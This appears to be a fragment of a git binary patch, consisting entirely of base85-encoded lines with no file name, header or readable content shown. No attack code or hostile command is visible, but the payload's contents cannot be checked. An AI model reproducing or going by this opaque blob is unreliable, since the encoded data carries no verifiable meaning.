zi*hb+I!xt|o#r1824m%|;ZFz7|2~H6{Mj_KK8FjKUvaiXIKPcOsENPFUUQ>+oF<kU
zP->8{q+Im%*E7D+&|klIG+L1C+Fq>95G|?P6>T4Q@1dPh-m>-;zRMe4(MKHjeS3;e
zKNua0jU|A0msM1y{VYu0IC0+9=-uv6A1>DnS?CMUs9o^x5if+yTZQfxw|?qNn-z#C
zxca5-XUIJc=_}vu4Z#p|{**n@y?=jo+s-A`AB3e9GF`zYzN#BD58#owBop=&5zOEn
zEJD&-muO4hzbxo@3cVEf=hG5r)6!Dk5BMV=BkiCuv!7=JZU%Q{S(;}}uVn4`)h*s1
z`PTf@Eh6=agkXu9i&Ea-c+~mNA{J@orD)Tc`&QbuMxWhe*tH7__FjHYtmp1~V&ms=
z^r`dX!Vi`4c&96k4n|jRaif5D?}~jzr(-@*cl4RvbtLho(>tv64f%IcIy;<$_Erhu
ze91!Rk9|`mq5WXynxSr9!zPI@v9=mx568?VjwhPEmkT^DSxeBmrT!@M{^wUtv7E?K
z5(l^T;A3}HRVhn_xCZ?Xru=+!-go>(GIITvPvQA@1a9wn<Np#0b5%_pUU4c`>PNYU
zEWY9Pa{tMDY0V0)VaK0YB;Mj2I$)%Fz2?eEK(?hzUNniH;SF#>GK#979zz^tB_;C5
zht3J6Xd~w^fjrbyQ?>JJgPE8N<X3-X3xlP4j2v2jzP|SMD^lanlONL3HwKs6YCn{E
zWN41PU%o3IJt)H48oR?_Do{F+cjWf`XuGZCiELOqE;kr$(%SGM79rrX^MXkr+!90*
z+U+Vd>kGmuk_O*znsW&EyYtP_vX0H?1&J8IY}I0E+^p_2aur35E>(IoY|{w3d2v}t
zxjUkhBh9pS>}P|VSd{l9?oM-rOUI1t;UtZI#LAWvPv0w->6e*nGow}vidgj}tHeL*
zbaZywy=?l|Xz5u?CyB=l=?s2t5oz<1QF|&?EOUusY~XrHdq%vVjOQ(=rpEm>=s*En
z{9_)4f@5$z=P|*A>3op<G7JWakf*@>^$tKA{!yEz@TdycyC_xHtJ@NCOGGnHmab61
zh9<fJ+BVjK%tXefc+4=K<7;Cq19&Kajq69XX>ZM)b_M`O*0t(v@x<{=nDJ5VAh7M;
zB#8?`vGU-%i=r4RDZ09I3-P0COn|j0#n?mtnzuGWVfBKk#*wHkoR=JhX;$PBOQPE5
zwY6NecHbt?p^ss~ZNIpOJ_%|I^LuYai_O({4t=AaiU-~Toxj6}ZXKcJuoZw{qLM){
z%bkjC!yU_?n!h={m;?y~A=?riiB|KQmKj@bO7o!%N1b~2C{v)|0l?<i#2w~8Z@_%)
z=edRyV8qrZ4lc_966!pJrNgk|6E+IYjQ59d;P{!;3ew&n5*_@}BFCxC>Pp|6%*M+Y
zZ|{Mt3tVYt<|4DE7Z~b<V|=vNaJj|Qq(+6WyCM$YyYf>%`?15I++obJ)O`$Kv!6h$
z;WvP_?dv@H0leo`Y9tgP4p(R(OFC0r!pf6Om5zasNq+rfHO_QHZAHz(xHqDXTY%j4
zZHO2B;f}GVb&E!T24iu}Z4&^^O>|W9Z`bBQ@|-MVE{gybBz$9#LEE1KCoxV5o#7eL
z2NOw9I9SLvv!ci;i$$#T4Id-L{Hg(aaYRcwEErERS@1wIuQ9@$8kx_71>cu<dFlUf
zqFRQskw`HeYeHQy3_4Uo<iz`Fu8fCCcD`S3?T$+Fd`(PT31x?xy7Fgj083TOa#<7(
z*0}g^1`~aBsaB~-))}?y{QD&))WIHHK(YA7!>x=_6%YZFb=Ss9KimP0dq799>PUxQ
zj<86lnm03ea3zsBLS9?1Brex9gt4@HgF(Ub04;Bkdnsmb6~Z;Zx8f&mDVTZiK{3!&
zXm`y*1OZriXs*oJalx|PM&h<FI~wwspIz?q_4xO^D%L)dW}hrdgft5N@y@(>nHHpo
z+nK!<VU?RRlNO(AlELY=1wtHbW=&kqf+0OaKnIgkYRCBObAe~Q6}yIJzyo2+`3o#i
zcsoo|@mhtbL2uT<4$}IOogQw21uC74%D~(;*2XK|#2W(Ti9kl}7M6M+B&QIbq$|M2
zIJ`*ztHh^0m5^g%O{8G3fY&H$Mk{Cy$U82ERLP)#AjiAI2e?fu5yzphwRG8+T$Jwg
zNeE+UFi=`NgGE~<?1QuZYiHtuj5fhlWnD@{Z9Vz^k8KF&1mK+-##laru{d1XjVDLz
z9qjYBQbDr#WfhHOhtD2%Z(J~Mq@(7=G4K2CCW4^ymL$56t~t|5|IWqZ>*~9=Sp4z&
z5ROFf(U-54@k_Ww|9D2(Bjs!PjYo`U6rjxW^ZUHzGt>MpiJLpR8NG%XGvVstW=h`b
z8RM=Fs>vz#y4&0Rw9jvEM{YsBjrMUl7eH2#Bz}1vzo5)egym@<GKNPyK(CG&f1xnz
zN(*OG(8m=|{>N(;abCF41qMzYT)J{)l1xGd@aGPZ6=p!Gs2EFzw+yRYX0BuDk_0H6
zlGA}%=Df9(WN;nPND#Ko=<~Z6^KypZKnrA%n@_@=2f&y!qClbt_NMnMM=zkY2z4<(
zcm@MlZy$ag8GqqpolhDu+}Wn9`yzR5op=5|@+N}_$^5v9wqIBK0UH;7)+yzD0_IFk
zJiK6NU&>F3Gw)iD<9WNe$!(?Efjft7V?$C;0U#K88yO*|6zSFaV1;)8HB*g3I;pzd
z#v1e{P%1;g46sY3Nw2FmCk`$7fmi+hFbdpU%!P=D@^i$!$Sw7iQ%nH}jsl?}?Kd`a
ziSvL~U_F)9=oaiGKpFinlT-1|i+6;g3l+uh>X=J03;0PT?I`&iyYSZyul9Ui^#EGm
zgGb&dltsV$BPTTZu=J&73#xOK8hb63P-8?3N`>)n^Lnk07B*d7OW}N9R#cPSB$%NY
za;5Z(w(!CH{va3P-j`1fhr<9612Y2?*x!)qe_!U>9ZYmFUnw8+(wO1zVP@`0Fvu6*
zF`kW|<#{ma<Qxfmc~6AxJg!Bu?kWRREtL`y2~K$fY7kV7a1?;!4Ah5fq2;vN{u-}j
zA@?Pv>(4x*^*SciY-@pnec3XYwMpOMWmxL2ekAgm4S)Q;1)H(KIEkV4ST2>SHW`7v
z^*_R6WCB_~iVCzyl&<h5XsR(d5Aa@9`rm_p6j~AO3tsHERGa{KZF@g>p(IZP*ZIQX
z4v8^DxFt92b&BZAI#|amX|_38d6NM4X4qh=)}vRku~an)EKceNRA~UlgypWEf=#c;
zNYKQ=|Cbsxr$SVZ-8w|I=%h?3C$7w1y1>JsUMwYk3#bo(2^<>~+Ax*(TfZqWp6>A+
z^mDa5r)SJkuxFgGj&O#>bnCg|h#LTyr4nd%jyqCXr}vWJ(+QJ|6Pc@Cg1a8f&W31w
zFUuEw{;M2@YD&h*J#4Xg#zy)vF4IWaUt->&%oe>_J(PgzeJNVBcv2{n4Mp9Q0%cDQ
zf+aG{HmXBy?fh53Q<E@PfbO9mP6sb<X@V5PsqbHcL+s6%BlM(7wI}C;V+{eo9s`gf
zP;!M{*GRo+q}I0QHe{&l+@d}+4|62vJSM?7jY5=7AR#H7Fe(7NWf6$i55EMfNl{b7
z@$q`-wS@z_dN1ctAfK=TWn^6zG%A6t8{iccyQ0K3V5v;eteZx~WvE?jxOPs5fVvXZ
zv~a*kLKH9=vcw5N5pZ2AWd9T}rV$7tf<?)f{{nJU9tHpP2lR<EDG=4aOhe7Z0Z-E{
zb|rw4DX?xyKyxaLbEv>>SCcdgdlwDV!fA!1zy#3t&H!CQdV$A~{-NH>NzC^DU@<HP
z@Gi3{SGLJC(pAT4efEdXW7VY%^cjd?5sVj|d7DCmJfQPz`qaZGbU`?9XsaL7vS1b7
zIOC;XW}4s!*0Q)rmV2k{3BF>c%Br{|G4QrfdYXSfF1trsxb-w|--9uECaNV7G5;_s
z4w#m)l=$`*4A@V<uiksi!L)ZGa{FaP{iCSrP~E;v$^Y`tIUGC`SVNWY-=b-m?B;of
zxaJ%FC-6^H=Bo}&J>ZJ$Ezw0>MLwmfl1OJ`fXc(+3jxL{e&r!Q;0jwAoriWSW$^9g
zBt(he%M<Z5TufIq(?UQZZr@JoC5k&7j{i;8r!ntRnGM7$wG7qrokT*za@`-Qlx4CU
z)UiAKGKSR(IF*T$O(mVbF+b0%Ed=tr^>MU4a-uZr=Q{GI`esH(I0@M>MRPbm>jQ@#
z!efpD*FP}#{$x-6fUw&U#tw5YD@j~8VE^eLa642|>7ntrRDPBP)DFI3R2;xf0c7u}
zv^mv1q3Up<HSK=i{-zRB_);a6UeyE;0C|Dr^CHI-a-bU|lx?~;+*5#Iy4fODsCTH!
z49Ibz=hDh$c;8SR*(bBdLrgm~Yu}$G;ir5R!ITTx>hm>2YrDpm&7?{;h94wlCMxuH
zo1+6!Z&lltuzNA(tHiD%TcJNsMG4Z<Lt$0~afcAuvUcelkty)rL`FoabFHC!(Ac*y
z>msDK1=HTs+I||tWFD$GqsBG8kX54DR$>cvCo3z3Wp3KE57=;#T7-Hv(;sG`g;V&(
zLsd^6Nvv!*_LXy!kujeW%XsT}?k#j_+OU}AvHn?V33d>QSq*UB@iXozOWSU4gq!#)
zo80~tT~<zQ9_qFhsc+AsS#Q@x*s7i@O$Errn%t_3@k{PrSvLM}fwz_~;A(GOL{aBd
z585S}O4EqG1Eu7VIw!A*p@CxB-;m+Et<h)xH8k$T1-}pmbh?TEUQ%V=a97cC&-8j@
z-^bSC%T%Kj;j6Jdk`=<+OBE`4PG#!6Ma9h4D8Z7m-khJ+SsR(tm)pJL{HvVm|1R}N
z{VM}M6XN?<wKJ<RN}^0Dw3!dtcu%G5MtNZWd|jf4MB_0JrmbO_+-@X?5UrDlh59#X
z1~3M(iL=S){u})bGpvxse?}a<`tSXd(;hf$+i^_!y*N~GUuS7HU-UM2l}%PxA{Tri
zK5g6NYOSiQ9BY>bQ`tUqUC?=dEn6A6sr_fHq=H3OuYPo-ayrkHz+)usYiyZLMO*wQ
zRo<YUJE~p68vdoR4Wu@z$t7Cgdl?zF?gUeA4I1*0mG)oeFh)t#a2oCf?)~8`cmn8p
z(k@XfBmFxd`jZ^xb0BxViId;dgKrj2l^f&6%iWj_p-2hz#;IrzIU0Gw#&<@3M^Q;3
zQJQ~eJk#W@n!Nf0U5-T6g~>^(pgPZ7dP5|riyx8M>RAtD?`JK<ynQXT)jo2c(qsS8
zaYuvQUbI}^W2zx;NbPLgaBu2lgC@I()N3D0wNQfuQ>>5rd6bP^+k~(SL$&@+x#~Qy
zQ33Idk(7VMC*`Vy&$XtDl%~oNlkIs8;7Xp1e(I3yh~vo&Bz)Q=Y(g%Mtub~|(nG*o
zw#@rsSMsZgi=b;{UY<HY%VWi+bdMQFkI6Tvhu=gVLTsXM@ej&w`@8q4AY4`4-qRF)
zMmk$Nmz3^T#PU169>SkB6`Yl6ICsbYkZg2O^gNm!J5gHw)SMppxEVF?Scrc4Xvl6s
z0;SDy*?d6i>O_o%|MO2BVnK+_6PXB9H)-)<^$;~m;EAZbqLoG6b7W0vj*vjSah~L;
z`O!kL2kql0#@C9~Sw9|q+a9PJmDrf%>wCx-ti;v2#5bLU@F)AZXwJ&*L4G?5)RJeD
zH^<o?Pt!Gl=M8zzn~OpI%1_FhyPPenqtU#t<E0$gr*@8}JL33UM;_OiKeR993%oUO
z$MtEywp8T=PZr~BKhIDWh2JV~*dmU9{5Z;l?P>W$N0D4j-xmCG!YsZLQL7=@iCQgp
z9rgbD;C>FHt<JKZ;EVQ3aX~H9zoX>>BhTsqjs+AbSW%0F5jT2|vt9!F45D!M#%rJG
zYWv6ai7>WfzLNbFSyon=7RRS#UC%t>^w{Z>C6hlCXmY2?YpSSL8InPJbg8`C{xRbv
zwvw`A5FP9mkyJ)>={aJJ$<~6`SFOTpf%WWcTvjtL_4!?naHz!gzIZBszLSS2ttY#T
ztbIQ17`(x=*`-s^-Ph4A<C>`idfM%>p(Z~e9Q<hSlY}r+y9%H1e>pEx&<o#*&6^sC
zepoWf%Q^o8+y#p``=bec4`q4*Pw#O&Ma$Wci_@OJU49O`Mg??9U5ckFXW=hoV3yG>
z$|iHLv#E=zCFmtHXp;?W;2K8)KxTJIp7^?21x$%tgP${PF|Q~`Zz)VRzk5%Bf^P^c
zf-b~QKn32yA1T)@*(%RW$kVY8|8mG-yWYnHvxZXMv!+O+WMwZfe=xbN#OlSWCMI}h
z&kzep1Fy_v0h|NTG9_O-&45ad)rRDr2b*Css$FxgjBnht+0%S#{J$^8ufBeGPLQy%
zpk6a-Th{KpdHZ3W0H2i@^=Z=PVVtU>{QZiO2SsqscYitF{uNi)xRpZokrM?t%D_<p
zw^F=frlYm~Nl_F0&U5C4v1w8FT7r#a=p_(!z(X*}J}sF-7$*Wsc*&4V1#*NLJ}WS6
zEl_K%Y`DIvlX48?$cM=*Vsp=p-hIfc+$Q$)gP0V_k@%0WKA7o{c2&N*e9yI49{_I}
z^iqDKA%%x@I)bq{VC<XL$v1hC!qTrF^m?u7q>8&`<MUHDbpQKp5b)E&=<DYf;c!ua
zu2I;L?JuoM7}cq#I&_lzy|<3S6!p~<m<T|Z*PAj3)!a@AvgXkHRbYB<@l{J|O~529
zHy;`8|2B#|AUS2l8Z|jr!Su{me?Xz~VSxL6(KBuX{-^1Y5^hRDMSI=LN`r~H&s@C@
zss%<0{l&$||9hDq|D{*h%aorBvn>`<{|@=rlmQNLnB+#lh?>6!VMY>ID<|tzfX{@u
zy`;UFJl<N2Xl|(twZHRGkR2@Tqs^i^C|h@uLLr22#aZAf;{CeNM1};wl}Sa1!SE!`
zA5gPZ9uOA(s?h2q)H(V1=N^Nr&+dm@0E|S|(AWV=_lt(%ua<sCiV!bfmXKSuXOdUU
zh*6X+`;T)Qclwc<c%4`KUbn|x+G+UGX;Zq^{KFqmw$r?*^RRy-9S$Rz-r2+YuUJn_
zdgtG@vTW3-dFLFbD7*R)R`=hL{XkYwe5Q}lH&ui2LiM4aWp(dZ+o+e*p2!brK7N>@
zI(8d2d7+~3#wMcX^=4Nv2g!z{U9mBLhI|`xu+0RIPfm%CPDxKlku$x(=*JqKEN7G&
zhz?7&r#EmbtCHg!R4e7N!4NKP9#mLmdU61`)S<#2#m$YZ@Q0!d!z+VIQtB%G!{xAX
zaRH2B*Fa$k8jDcvwhnpY_!waVB{{vaI^N-FO?(j4%4I*+hKJ{A@x%qS*y_je_XiOb
z1@SL9e*0$TN_j*e$5>zNr<7XD@odRbL$VSPZa>A(MPFRLn}tLcehzh-Uld|yCnEf9
z;Q~TT9w7IP0%M~zkSPO=@*VNi6!Kz%spmJwtA^>a=C!g~ziIXGPBrZvulzJ-0|$oh
z?X^-?NzezHhhi#^*o$C!UneY$a_`ysf~Pv76CY2g>GGqlO*PCi2^Y!=zZ{J*`aC@*
z@NJB5C$JK45WSHu)@SN!k(;9*`rL3xdGFCZJr`#6FPs{VB<VY0J{wAV@oBCDMe!Q9
z_U0=t7F>GB`+dK-aWckv)ai%+>UcKlzbEk`-}aa4Eu>!f4&Qi|KW9@$#w8+9w~B$^
z8=!0&R;AZ%cxUE5wqEdAsN6m(y#}_l4?e1$I-jtJ-;XxSO9Uf0y}9DhGShQh9WAOx
zFpDD*bo|%PwRbUm8I$F@UE8&3058UTGZ|Ue85mrJ90~zPVASsFW}leO3j2^JO|J#=
z;Lr?_5&1CBU__5TPh|&Tn)hTzB!dsnNSO}U#!#kt6%Y2gcy@x(4Ea7r$<`u@>r!)E
zAn9!=yzmG}zGpjbBcY)WeId?#Lt@61v7T{=1w1j@IIs3mNzsdU)j@I#TuPS_m&g6g
zfPq+6OGtKyjEd=bCq>)PgdL39Jj`WQ9ad&unzUzO)D-#-8|%cyD?GNYw%MNi@XXow
zz+0U+aBJ-&ulMySld`bKNwxwZ=atS)pZun>Ao5)Tyat<6*{V$&H~J-f%Q~M~$E~+d
zr$x5o`;;83ZXGnCs=`;6_ck!j=)`GGlyu6RpgcnoOUE@Q^BN($MMYS1*^;6u7gU}G
z1)2GCeDVwuSTg2<(AjqC2}CIAx|2MatZA`TE6!EHXpjaVeBVwgQi3O56=D2EBjr1s
z(Lf8y6VwT|4`IhReqzKB1ptmunS*L>oq)10IInY+UFVqM#c8k=5@!z?FVO?zVCqA`
zxQPiIf5K=W)K7s3@sSrHQ810sCrVRHm7Drq7$Jtq^k-p}e@wVw7!flRH06n!(2bzf
z_4W9M&OPu=D(m36i{)0{ga+}0>I{gm6*?<~w|D~MHxHc53Q6n0N2^+Xr$yA|eBM?a
zXMUjs0pC0VM*3DB?ef6YUrdtTNDU;-0yTD@n7~-XBi@5Vbh&Tzjb<Clbyf+;DTMD{
z9ogvWSFjTpe3zA7{(H%IPe=FF>zC#Kdgj&W^k&MK%LRXDb@}wii?dz2Z={ZM;5)1;
zy!BHed?y9?+E^z<5Qm5^-F(7;n^c6SCW9!mj}+GwSN$ge90DLIU9(Bbnk14V6~ux~
zGC-;YLr@e78}1~T?MpK>b>5KaqA0Aa)r((@p%!p(KmE%lj^W)F7%8?>A(4hjXF<CQ
zWAP)_=ftFBt(HUq*9Od$dCN=zdpqkejxj-5uu|m#6v|oz<0MeSg((<t9k=?k(L})8
z+7%nBIG1V!E_Z@lta~PrC_=z7M{gwpZirxY8)~&ca6=)<XrLyqX&#6$q5k#Q2zY>t
zR){e8_IrzIZZJ2wKDZW;OC@m;i0KoPcf~|_3*;Cv1@RAa_}$dfb^2ISlwxM&68jqT
zeA)7{3eBwH0cMt4K!&9e2On%9?-|AV&Qy+Dm$!!16YrHf^a2mD$x+}&LO}d(>|!_e
zc}3WT_S=mCi<)DN3jWvb-KL(oQ~P+I1!vZ)<I9;x*v#-rbttt5eAxjHZ^;Ad&b?Ho
z_^cDqALS!<j3YMDdEUWkq-=LuNtK9^dlM`R6Jx+~J;ECpy_bK6A&JGTy|YkPwk3s$
zTSxmlxLnB6$z$`p{*#|!Aa$l<?KI1I+sR)<&9k%d>lX`4tJDB2yVP>DQVog6%5ufa
zy1{w1S?RCjUs=P6wVa@uPvWv4jo6=)kPg_F_4`hSE7mVGe3ee8n`q?v_5f9f*eh;#
zfBnvq3)Tth9u>s|XBa*|kf&0}A=blzZBNIPUv!>z?BASH9a}H_N9k=4m+D+?8mREm
zo$Aha78;@&S8{jVUOHdB=76dXnq_Na78LG(Sf=of;CGu*DJanQ@eAnlTj$C-Z#pf*
zck`jLS6!_hf(O5{;$3xeT)*TWXe79-t@RlXKY9PfFs4Xg$?^yKUD0X?@s{4aKesuP
z;C|$r66^DX*7g91b(DU=QvX{80RWSg^<VzZ^>bfJo|U30T3hgqTGZfM`;g5<@ar4z
z8)@z9AMf0e(5uB_o$q8A{-<JCUQ_NkvM%>T_|JQHP}J}KEZUK)qg~gF{Cnj^W5w9F
zjV*iyYvca~b$NY6K0O0vJHBvxN@gD})fO+Cd-Fck{?WhhZjM>p=?QrMU+%ZgxX1(5
zx;GaII)5H~o4hzbObdwZ`q4EC`gJWUsq-BB?FnnWBh_(_7GW_ef0DL7e=ZQykqlGt
zKP0|fJd1dx+unBlODFfGoD0fX)6G{r9VA)#Lph`FR48OUjjGZg>-}S?vEA?asY}7<
z)8O-%H*aN!B#LwIo=sWsU#Ka%v)%db=kev&h<{?Aw2!}xPYZcp?OQf|y}wCqvV`yH
zaR0E51g-a7w$FFZpxW7|zUR2wVBD|nmWvS8?q7?W@#E}63~IsT0vESKj@YHVgkQcg
zuU}6he@`l_h5CZ|UOz>Dsxuw$@m*f@J!m?8_s8UOK%v-6p%RzYsyFgRNm>exZ2!hD
zlra@K#8v)@9qe_@?Vcg+I)vX*+Z+kW?hzJJDAN1)?Z@=N9yN<G!*BuT2j_3Bh|&p8
zce>Ra`=MQR4pwh<FQq4T&)3YYT7^x=YW6QNe|y$AO^7zV|MBpvk~cNvn)R#7MHVjg
zArH$nlX~r!lh(bpOkW&=ljD0Ex4#D6bKestU0az!e%4)i`ZetV@0(IcPrJ+LEw+CH
z_XBdHhv*mj$&af~@A-C(J-F>?|Bbu7K<{WNZsX$>^r-`>`|d#Bh0Qp1%~zQhL;oKD
zcR+~0!OdP}<V4%)O-E;rUqwCx7trcfmp8LaBg{CH#-+;+&3o^R)FkuMo}ykidma9;
zoMSevMNO{gRZrWD3qQrbZtJgOjp`3qTbimCZin9-<GPdmZoK8}j<v1kjR#i3o&Nr6
zV?9kh^#MEayw|f$QNR4n0Kcf>wrS4?PE8b1N7g>NmS}rd2(pw}8HYX9f>&^sPYp+b
z6jp3yw_52m95iJex`%rQ^nn+*e9<9SXg6C7_Z+qdK5;f`B}Z82CL1U9R6EyAIJSQO
zvvOlLc>5E8VAg-w(SQyHfa7-=L`HDdp<5V+W4v{Lz$Sa%qa3laSY?)Ey(eU7C0C%q
zQBt>2=ag{x=4y!cW!FS)TGoRKXjs-nWep`v1~!C;wNM(@VqiFU-tu9)@lAM_S=NDd
zAc#PI$Q(&Gf%Alh8zywsBY1z-ac{PUvr$$JC0K!1diQjOg@}ZaIB?7sWBw6mE!LM<
zWQaZ9hKSOWT4cs#l9*zr_jkhfVaCB+jRA3{*FQE0VcSJg_GWSE1#}CDe3(^EFNJ`;
z6;b3Ch6y){<KT7Emw~Alc<Far<wk$aB39AnjC7Y}XoXeU7>#0<E+Y7c9*96L*m2>K
ziDH%;!`Ca()pOVPagxW5dsl(OR({=sjm5WxKR9#bGIA358YU=VLHJV!*kjxCSMgVT
zqalkq=5*QQiDjo<<5+jw^n%+pezYfNZRcOews+~3XZtvE<rP%vgmy{Qb<HMz@d#z+
z)qVuFk`;w=<`iq~l^#%XgrU}pT1bbbM|I$sV1Y<;PH2I4R~sDV{$fGtEZE^vbOtQ6
z7k)@-ECOeD2?<}7Wj&CWlZhsb>V;)bSA^yFf<xy|XSje9=Y#OHj1Xx)?RJSgICvIj
zR?pRtjTaq?)+{SWi~6NhuBebk*m@P!UpFR{w$^g(hJiKbf&ynv6Sr-sS62;ZVadpk
zd<Kt^`96p?nd(SZtf(&E*prTB9W?co_Ec@%bYljVjufej(*{@CG<x;7nUd&t2sDQj
z*>k%FYEc<(yVigU=NU^$QDKRF8%SbeHFsu74olg8JlKQ*SYy*jb27Mig4lNS$A`9M
zeV}DrA=iY*K`hEbjxE+3I(Tb3hgTiha^Xa9*EW{dNqR;831c7`l1as58z@_S=$Vl9
zlhY|29@m=t`D!y+k<56I8hMcC8Dxm3dHA-5jYxcI=NY2-m&nqOdsSBDGE~3uVa@j$
z`?8T`mwk(c8ksm);^bEa7(Z{NP@AS{xX4!WWO8IFdgOJRhNx}<<}62bjy&fp@mZkU
zvttxTepB~pmp69w#EGy-V+xpqZ^npY*^uoRbi8t-w^5kS(V6%uSqIfbNA+Un6Nihp
zeX9jjx&fsV2SB-5S54(|E$WVNS%+XJq)mBwBuHZk$)6~>m-sVm+~kt$6?344VP|?8
zX8Dfp*PzPBk?84pT2_#P7<BA(XP)LNinfP;RgnIW`aS4lgDDta;^$*>cW*B?h_`iY
z#?@=;rDhEjUXBM{#)+r`)OsMAF8Z0J&rz#r8mT`@a@g5eayXHc_+tc^Z?YyU!3jPX
zs-&vAju6U=%bH%+_gqZ3kHQ*;&PsUoL7MOQgZATvdKZ0)m6Vx>nH1U*MLAb<iJZpz
zelMAQF3O&|(mi}wj6m6;6{@OqHfIXDs=Q{4W+g1!hMsL2gs^3ejOu{3C9MEtqD#7h
z)M2X$gr(TUdbM?gOgLR?m#F-=j_p;N8LExI*s(^2bmAqZI0vTR^Q%f~kC12^H+pL3
z*s`vA9ka!tlQEv_2y5L+v+#$V@Kk4$sQxTahEPrEQUK_HbZU;OI9m5}iN=>L$=Q~U
z)?L$xWND>y*a(aznqwFEimRxsq*{{1_m-&&k0<9)32Ge4h%UGav6z9S<+!jKD4zzZ
zUsE`Nq?l{f#y(N{v8rcm2&qnG`IO7`psC81XGXO87^c0rg!W}?yf<|Ldz0Bwi3Q8G
z;$oAEn`*aWZ)E5jofmnk=BfLLnl0(Mw%CPm^;f?&lX{4@_ZMv>in0Nvms!<T_4ae7
z7=M#@wD(1jz9o~e>9B$zv2HsEZ5w_C8FIJFbIi6{z1p?vnTXQ4c-fkruvT=rb*QQ6
zorPJcmwB?Yiw^C?vcuJh>Nui{{)=S$)M}D>c?lY|V0dl^_<l-jiE$ccQ7d_z7Fu0N
zzPkszH@Q#aN>1U6z1I7s$^~|AXIDt;kBVA8L{*qtd5?&BqABN>7<Q${%bDuJgf9t@
zI%;_y>T*Vj8P|onT(^wW*Natou)TI_NQpg1#amsaiq8AFGTV*Nb%GyjW9;~Uf#rkr
z`?snHQGp4ajJkf#7qvioX1I%lb1AlcHmbzeJ~w!>&UU72Hfi;kv|IMP-;=Bx`99j{
zY<8tqub3NWWqZYWx?5*?_u0Ydf~6feqGRk;C?-|`hEO5ObNv%wGY6>m$aD>*n6u}W
zSt+(H{HQw1#rD)8GJJ;qktjb-s<Y@*EY_5q%Gggb=BbcJY^}-0K<T5k0<;pji<mqt
zDrt)umtR;3kkUGsEJ%IbIb(jNh}Lq$pjW+>Wpqz9a<P~m;Nr%x34F~dnp>-a31++<
zoV+*3av}_)!`pM5Hlw%rSq7Mkgsa9lN28V3Ett!KvKNfahMQ}(XI7hNYbstq26>7%
zbt)>rC8s@aWzS+rsYj-Ex`?vVE1dy|#2jgBW2m;-L$cINc?isaFBf6#Db6Uoz-#ua
zq<V#AN}dFSv;K*(!Muxd$d<0rYLSVe3K*cDNyp*1rOW1bxyB*V2dqOHsF&5!tan}M
zN`3MAYQSPE?^*t>L)oNWscW@cO@LRWtf^&CceZ6at;-mouqRq848H`No}SgtV*Ew5
zXQdC>!!Qg!5gLzp8r9M4dPHrvx@(ANIbP=rf2JqXPdhGm_*TLtuX?+UbXT|%c%<91
zkk4sQDDBq_<W^WI)@%Hrhc;{M*}Hjpf4Qm3Im?4qjJu45&9oWCdvL>jyo0mlk@EO)
zZ#~JHI<M*_$K>|az;~+i(_y<gx_>FPVP|g0HiWHgQ_<(Z>Q;2%c9>W-+eBAiz`0g;
zi<z)uwYICg`jDI#e7Soa#=<>KfXmi}3?0aAwjBJ|?v`~A9k5sV(2MG7gLrJ*M8l!o
zu7xE_i~d_tcUxP4Hs12u)=6F3{wbdkI!%JgrMx4eIA)tS>u?S_z|8HpPiSr&z0>-o
z-nsf37gbve`F>XkoPE0912o!MId|GAsU)3T;03Y(E|!#>o}?Pe<jIm~wuVKxpGx?m
z2&`Kc8iLl%lYu>Rm56-(#f<@Ju(Imf0WQ9!Y+N9XZI=qs)LhW~9J3kdku-Ogf{VfU
zD4UxX!WFu<B$eLC9Jol>m!{Z;jN8IghRrN&!1IOBu{nL0OUMP7)J#p`j)scSc#H)O
zml1r?X!zAG>7mzCUp~H*1L=cu{&dP^W;c9bEgl`vTvLBm2pWbfk=D>j$_G~f1yHaM
z{(M>Gh%nA^i(6vR=#L)SzOBH5aOlqR3OE%GQs5;>2ykL79BSYN-}S^k8kVl`1i}MA
zW%C5)bXAT11PjF5g?m#(`Uz411zq4JXyE9Da@&w01&LBqrk*`gFa}xh1=XeNeemmE
zV6Q@<1z!LMPv9lm3tfqT>>U`!1#8;R@kJYf22nG`eEE27O^61EVxhaxtJm!-dsg<y
z(!l7|xv6=3NUzi3%*PAObt+5<zyzI+07|g7!6hR6&3d131x^qb**M>by`)l>;5bJc
z5Z?evM3b@OU??_GAr1?tBN;l>NGq*c9xxUAP%_JK(^jY`anb@g0SnQP86&0s1~<R(
z90Bn~^C|#`X)2kNTN45l^dvci7g68@H@^pH-~<T36XHVi&XOU3#Vs0e1TDZ6!wMty
z@eWRKIt&jAERX}XkSJCP<rtDglCkXcyw0Cs>L>sx#R91CDaUO-T3s%fN?dzsHo30Z
zmK8szeu|)S?Ua#ek0`g^g8=Yu>-arJ4m#5cFc3wZ00&AUQ+e<&e6TSjCu^JX@}xv0
zgRn6(i21=7D^6AjTmw{j00(f8tcBnPB1SEGQu>=BOsJ21c;E)HkNb6y2tYMpvp<D#
zkOk+!Uwxnrdayg4|NGw)Q+aR)8}J2v05(;iAB+<Y(2sa@1_z9B2ciCt7jv%%_^=nd
zzjNqM>Ud!K&f*P(urc^x{)Z3=4-Of5fB-je24|q^utNKQu*b)@w+10cIJiQzCpb7L
zc*hd7cPF?Zb{FT!2j?b;_ZZ5Dr$N**<9G+BN7}d7=hjNPhxZ9-h?sYmh}X(ubG3lz
z$cbmWN!psXr-%0erU_Xq>uB5BnCI3hxW{VSeP@P^R|{u+2SSv{nfTZ}I2td?H(T3I
zOZvFqs4w5%k5I9F1pDEWr_UX{TJsPxBnXLKt55^+CG-agTSSQEA{u-LG328+B1@V)
ziPB`7l<)eu>zJ@y9t}nC7+At5O924_ZtO`TK+YaiKMg40iT;z5ASyfsELcfsLzqEq
zb_#GXr_Y8AJcBSJNTtTCuzEH$9kWNx0iLM>#;ej)2SYqkvw7e-j8BxNNZ?W2qorvP
zK5DE!n6st;7(QBy?19mAahkOP7|0prh-p&+VDhMF`sJM?7n?1^<!PDEm8MKW(v8d5
zEYC5TBd;+4+M*iVNPkk6J4owdQXP0ckb`3Ipyci3QRG7<^`qLr`J_1{Z&AZUwRwhl
z)-(vIyH^phOQfX@9xsAcG*tq<>4GtQ-1DSSM-ZDsgbOqow83C#c)<sI^F;JQWYDF;
z2M2?ZCx8xv?8Orpdr&9<60ZqBfdDvY#=uVW$tD1O{wplNlMVSn#uE|*bu`K>nDGNr
zNe>aE(M1Do6w`~n98}|u^vt6aj}gTvid#NH^4vyB4*AF|+ZDvpK2TMOWtJw9lqEti
zfyC4WG{CZfTxk@b#D0jZkV7E`NXP<%8(|^97khZH4uFffq{kjJiNS{lH`GDJm=JBj
zz#K1(5d#j*xHQ6GFgQ@hjQz+Y$QHwlvVnzs1csI%Y23sI7bO}wf)36tqXD3)?y*IQ
zvC`Lq4SRqf7aI)-bsixs)I<ms^YOug15!rxXFP#@F;f$HAg}~r4bUOlAROE<hZd<N
